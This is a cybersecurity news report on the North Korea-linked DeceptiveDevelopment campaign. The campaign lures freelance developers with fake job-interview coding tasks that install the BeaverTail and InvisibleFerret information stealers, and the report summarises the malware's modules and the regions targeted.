Freelance software developers have become the primary target of an ongoing campaign, which utilizes job interview-themed decoys to deliver malware families known as BeaverTail and InvisibleFerret. The activity, linked to North Korea, has been codenamed DeceptiveDevelopment and overlaps with various clusters tracked under different names, including Contagious Interview, DEV#POPPER, Famous Chollima, PurpleBravo, and Tenacious Pungsan, with the campaign being active since at least late 2023.
According to cybersecurity company ESET, DeceptiveDevelopment targets freelance software developers through spear-phishing on job-hunting and freelancing sites, with the primary goal of stealing cryptocurrency wallets and login information from browsers and password managers. In a report shared with The Hacker News, ESET noted that the campaign has been ongoing since at least late 2023 and has been linked to North Korea.
The attack chains involve the use of fake recruiter profiles on social media to reach out to prospective targets and share trojanized codebases hosted on GitHub, GitLab, or Bitbucket that deploy backdoors under the pretext of a job interview process. In November 2024, ESET confirmed to The Hacker News the overlaps between DeceptiveDevelopment and Contagious Interview, classifying it as a new Lazarus Group activity aimed at conducting cryptocurrency theft.
The malicious actors have expanded their reach to other job-hunting platforms, including Upwork, Freelancer.com, We Work Remotely, Moonlight, and Crypto Jobs List. The hiring challenges typically involve fixing bugs or adding new features to crypto-related projects, with the malicious code often embedded within a benign component in the form of a single line.
Security researcher Matěj Havránek noted that the victims are instructed to build and execute the project to test it, which is where the initial compromise occurs. The repositories used are usually private, and the victim is first asked to provide their account ID or email address to be granted access, likely to conceal the malicious activity from researchers.
A second method used to achieve initial compromise involves tricking victims into installing malware-laced video conferencing platforms like MiroTalk or FreeConference. Both BeaverTail and InvisibleFerret have information-stealing capabilities, with the former serving as a downloader for the latter.
InvisibleFerret is a modular Python malware that retrieves and executes three additional components: pay, bow, and adc. These components are responsible for collecting information, stealing login data, and installing the AnyDesk remote desktop software.
- pay collects information and acts as a backdoor, capable of accepting remote commands from an attacker-controlled server to log keystrokes, capture clipboard content, run shell commands, exfiltrate files and data from mounted drives, as well as install the AnyDesk and browser module, and gather information from browser extensions and password managers.
- bow steals login data, autofill data, and payment information stored in Chromium-based browsers like Chrome, Brave, Opera, Yandex, and Edge.
- adc functions as a persistence mechanism by installing the AnyDesk remote desktop software.
ESET noted that the primary targets of the campaign are software developers working in cryptocurrency and decentralized finance projects across the world, with significant concentrations reported in Finland, India, Italy, Pakistan, Spain, South Africa, Russia, Ukraine, and the U.S.
The attackers do not distinguish based on geographical location and aim to compromise as many victims as possible to increase the likelihood of successfully extracting funds and information. This is also evidenced in the apparent poor coding practices adopted by the operators, ranging from a failure to remove development notes to local IP addresses used for development and testing.
Source Link
